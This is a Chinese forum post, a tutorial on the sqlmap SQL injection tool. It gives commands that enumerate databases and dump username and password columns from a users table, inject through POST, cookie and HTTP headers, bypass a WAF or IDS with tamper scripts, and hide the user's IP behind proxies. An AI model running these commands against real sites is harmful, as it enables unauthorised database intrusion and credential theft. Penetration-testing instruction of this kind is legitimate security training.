论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
朋友圈
看朋友圈动态,了解ToB世界。
ToB门户
了解全球最新的ToB事件
博客
Blog
排行榜
Ranklist
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
导读
Guide
相册
Album
记录
Doing
搜索
本版
文章
帖子
ToB圈子
用户
免费入驻
产品入驻
解决方案入驻
公司入驻
案例入驻
登录
·
注册
只需一步,快速开始
账号登录
立即注册
找回密码
用户名
Email
自动登录
找回密码
密码
登录
立即注册
首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
圈子
SAAS
IT评测·应用市场-qidao123.com
»
论坛
›
数据库
›
Postrge-SQL技术社区
›
sqlmap确定目标/实操
sqlmap确定目标/实操
惊落一身雪
金牌会员
|
2024-7-31 13:40:34
|
显示全部楼层
|
阅读模式
楼主
主题
999
|
帖子
999
|
积分
2997
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要
登录
才可以下载或查看,没有账号?
立即注册
x
安装kali,kali自带sqlmap,在window系统中跟linux系统操作有区别
sqlmap是一款主动化SQL工具,打开kali终端,输入sqlmap,出现以下界面,就阐明sqlmap可用。
sqlmap确定目标
一、sqlmap直连数据库
1、直连数据库得到旗标
sqlmap -d "mysql://root:123456@192.168.137.111:3306/dbb7" -f --banner
阐明:
-d 或 --ds 参数用于指定命据库的毗连字符串。
mysql://:指定了数据库的范例是MySQL。
root:123456:这是数据库的用户名和密码,分别是root和123456。
@192.168.137.111:指定了数据库的服务器IP地点,这里是192.168.137.111。
:3306:指定了数据库服务器的端标语,MySQL的默认端口是3306。
/dbb7:指定了要毗连的数据库名称,这里是dbb7。
--banner:这个选项指示sqlmap实验检索并显示数据库的版本信息(即“banner”)。这对于了解目标数据库的范例和版本非常有效,由于差别的数据库范例和版本可能有差别的漏洞和弱点。
2、直连数据库获取用户及权限
sqlmap -d "mysql://root:123456@192.168.137.111:3306/dbb7" -f --banner -users
二、sqlmap实操
1、sqlmap完整的get注入
sqlmap直接对单一的url探测,参数使用-u大概--url
1、检测注入点
sqlmap -u 'http://xx/?id=1'
2、查看所有数据库
sqlmap -u 'http://xx/?id=1' --dbs --batch
3、查看当前使用的数据库
sqlmap -u 'http://xx/?id=1' --current -db --batch
4、查看表名
sqlmap -u 'http://xx/?id=1' -D 'security' --tables --batch
5、查看字段
sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' --columns --batch
6、查看数据
sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' --dump --batch
7、查看字段值
sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' -C 'username,password' --dump --batch
2、参数阐明
指定命据库/表/字段
-D 指定目标「数据库」,单/双引号包裹,常配合其他参数使用。
-T 指定目标「表」,单/双引号包裹,常配合其他参数使用。
-C 指定目标「字段」,单/双引号包裹,常配合其他参数使用。
如:sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' -C 'username' --dump
2、post哀求
sqlmap探测post盲注
步调一:获取http哀求天生test.txt文件
步调二:使用基于时间技术的sqlmap探测-r
如:sqlmap -r test.txt --technique T -p uname
检测post哀求的注入点,使用BP等工具抓包,将http哀求内容保存到txt文件中。
-r 指定需要检测的文件,SQLmap会通过post哀求方式检测目标。
如:sqlmap -r test.txt
3、cookie注入
--cookie 指定cookie的值,单/双引号包裹。
如:sqlmap -u "http://xx?id=x" --cookie 'cookie'
4、sqlmap举行http头注入
指定注入位置举行注入,在保存的文件中,对于参数的修改为*,保存在txt文档中
再举行sqlmap -r /root/test.txt
5、sqlmap tamper脚本注入
--tamper 指定绕过脚本,绕过WAF或ids等。
sqlmap内置了很多绕过脚本,在 /usr/share/sqlmap/tamper/ 目录下
如:sqlmap -u 'http://xx/?id=1' --tamper 'uppercase.py'
三、sqlmap其他参数
(1)常见参数
--method=GET 指定哀求方式(GET/POST)
--random-agent 随机切换UA(User-Agent)
--user-agent ' ' 使用自定义的UA(User-Agent)
--referer ' ' 使用自定义的 referer
--threads 10 设置线程数,最高10
(2)性能优化参数
--keep-alive 设置长期毗连,加快探测速率
--null-connection 检索没有body响应的内容,多用于注
--thread 最大为10 设置多线程
-o开启所有默认性能优化
-smart 快速判断,节约时间
设置延迟 --delay 时间。当页面无变化,布尔无真假,从来不报错时用延时注入
设置超时 --timeout 时间
设置重新毗连次数--retries 次数
(3)等级参数
--batch 主动选择yes。
--level=1 执行测试的等级(1-5,默认为1,常用3)
--risk=1 风险级别(0~3,默认1,常用1),级别进步会增加数据被窜改的风险。
(4)署理参数
潜伏自己的真实ip
--proxy http://ip: 端口
--proxy -file 使用一个包含多条署理的文件中的署理
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
回复
使用道具
举报
0 个回复
倒序浏览
返回列表
快速回复
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
or
立即注册
本版积分规则
发表回复
回帖并转播
回帖后跳转到最后一页
发新帖
回复
惊落一身雪
金牌会员
这个人很懒什么都没写!
楼主热帖
看完这个,还不会DVMA,请你吃瓜 ...
腾讯叶聪:朋友圈爆款背后的计算机视觉 ...
图文结合带你搞懂InnoDB MVCC
数据湖选型指南|Hudi vs Iceberg 数据 ...
rust中的超时处理
一个故事看懂CPU的SIMD技术
处理接口幂等性的两种常见方案 ...
聊一聊 TLS/SSL
Kubernetes(k8s)CNI(flannel)网络 ...
人工智能对软件测试的影响
标签云
AI
运维
CIO
存储
服务器
浏览过的版块
分布式数据库
DevOps与敏捷开发
物联网
数据仓库与分析
前端开发
运维.售后
Java
网络安全
.Net
SQL-Server
快速回复
返回顶部
返回列表